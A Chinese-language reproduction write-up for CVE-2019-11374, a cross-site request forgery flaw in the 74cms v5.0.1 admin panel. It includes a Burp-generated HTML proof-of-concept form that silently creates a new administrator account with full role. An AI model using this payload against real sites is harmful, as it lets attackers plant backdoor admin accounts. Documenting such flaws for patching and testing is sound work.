CVE-2019-11374 74cms v5.0.1 后台跨站请求伪造(CSRF)漏洞¶
一、漏洞简介¶
在74CMS v5.0.1后台存在一个跨站请求伪造(CSRF)漏洞,该漏洞url:/index.php?m=admin&c=admin&a=add 攻击者可以利用该漏洞诱骗管理员点击恶意页面,从而任意添加一个后台管理员账户,达到进入后台,获得一个后台管理员角色的控制权。
二、漏洞影响¶
74CMS v5.0.1
三、复现过程¶
首先是骑士cms的安装,设置管理员账户名为admin777,密码也是admin777
安装完成后如下url进入后台
http://url/74cms/index.php?m=admin&c=index&a=login
输入管理员账号密码同为admin777进入后台
点击系统一栏,进入到【系统】->【网络管理员】->【添加管理员】中,进行添加管理员
填入自定义的用户名密码邮箱,选择好所属角色,点击添加后抓包
使用burp生成csrf POC
POC代码:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://url/74cms/index.php?m=admin&c=admin&a=add" method="POST">
<input type="hidden" name="username" value="test007" />
<input type="hidden" name="email" value="test@qq.com" />
<input type="hidden" name="password" value="test007" />
<input type="hidden" name="repassword" value="test007" />
<input type="hidden" name="role_id" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
测试Poc前记得先在管理页面删除test007用户,以免无法确定Poc可用性
赋值html内容到本地的Poc.html文件中测试Poc
原管理员列表:
点击Poc.html中的Submit Request按钮
点击后显示操作成功
回来管理员列表刷新页面查看管理员是否成功添加:
